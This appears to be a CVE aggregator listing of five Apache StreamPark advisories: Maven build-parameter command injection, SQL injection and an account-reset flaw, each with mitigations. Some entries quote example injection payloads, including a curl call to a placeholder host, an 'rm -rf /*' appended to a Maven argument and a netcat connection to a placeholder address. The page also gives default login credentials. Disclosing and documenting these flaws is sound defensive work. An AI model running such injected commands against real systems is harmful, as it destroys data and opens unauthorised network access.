CVSS: 8.8EPSS: 0%CPEs: 1EXPL: 0CVE-2024-29737 – Apache StreamPark (incubating): maven build params could trigger remote command execution
https://notcve.org/view.php?id=CVE-2024-29737
In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low. Mitigation: all users should upgrade to 2.1.4 Background info: Log in to Streampark using the default username (e.g. test1, test2, test3) and the default password (streampark). Navigate to the Project module, then add a new project. • http://www.openwall.com/lists/oss-security/2024/07/17/2 https://lists.apache.org/thread/xhx7jt1t24s6d7o435wxng8t0ojfbfh5 • CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection') •
CVSS: 8.8EPSS: 0%CPEs: 1EXPL: 0CVE-2023-52291 – Apache StreamPark (incubating): Unchecked maven build params could trigger remote command execution
https://notcve.org/view.php?id=CVE-2023-52291
In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low. Background: In the "Project" module, the maven build args “<” operator causes command injection. e.g : “< (curl http://xxx.com )” will be executed as a command injection, Mitigation: all users should upgrade to 2.1.4, The "<" operator will blocked。 En Streampark, el módulo del proyecto integra las capacidades de compilación de Maven. • http://www.openwall.com/lists/oss-security/2024/07/17/1 https://lists.apache.org/thread/pl6xgzoqrl4kcn0nt55zjbsx8dn80mkf • CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection') •
CVSS: 4.9EPSS: 0%CPEs: 1EXPL: 0CVE-2023-30867 – Apache StreamPark (incubating): Authenticated system users could trigger SQL injection vulnerability
https://notcve.org/view.php?id=CVE-2023-30867
In the Streampark platform, when users log in to the system and use certain features, some pages provide a name-based fuzzy search, such as job names, role names, etc. The sql syntax :select * from table where jobName like '%jobName%'. However, the jobName field may receive illegal parameters, leading to SQL injection. This could potentially result in information leakage. Mitigation: Users are recommended to upgrade to version 2.1.2, which fixes the issue. En la plataforma Streampark, cuando los usuarios inician sesión en el sistema y utilizan ciertas funciones, algunas páginas proporcionan una búsqueda difusa basada en nombres, como nombres de trabajos, nombres de funciones, etc. • https://lists.apache.org/thread/bhdzh6hnh04yyf3g203bbyvxryd720o2 • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •
CVSS: 7.2EPSS: 0%CPEs: 1EXPL: 0CVE-2023-49898 – Apache StreamPark (incubating): Authenticated system users could trigger remote command execution
https://notcve.org/view.php?id=CVE-2023-49898
In streampark, there is a project module that integrates Maven's compilation capability. However, there is no check on the compilation parameters of Maven. allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low. Mitigation: all users should upgrade to 2.1.2 Example: ##You can customize the splicing method according to the compilation situation of the project, mvn compilation results use &&, compilation failure use "||" or "&&": /usr/share/java/maven-3/conf/settings.xml || rm -rf /* /usr/share/java/maven-3/conf/settings.xml && nohup nc x.x.x.x 8899 & En Streampark, hay un módulo de proyecto que integra las capacidades de compilación de Maven. Sin embargo, no hay verificación de los parámetros de compilación de Maven. • https://lists.apache.org/thread/qj99c03r4td35f8gbxq084b8qmv2fyr3 • CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection') •
CVSS: 9.1EPSS: 0%CPEs: 1EXPL: 0CVE-2022-46365 – Apache StreamPark (incubating): Logic error causing any account reset
https://notcve.org/view.php?id=CVE-2022-46365
Apache StreamPark 1.0.0 before 2.0.0 When the user successfully logs in, to modify his profile, the username will be passed to the server-layer as a parameter, but not verified whether the user name is the currently logged user and whether the user is legal, This will allow malicious attackers to send any username to modify and reset the account, Users of the affected versions should upgrade to Apache StreamPark 2.0.0 or later. • https://lists.apache.org/thread/f68lcwrp8pcdc4yrbpcm8j7m0f5mjn7h • CWE-20: Improper Input Validation •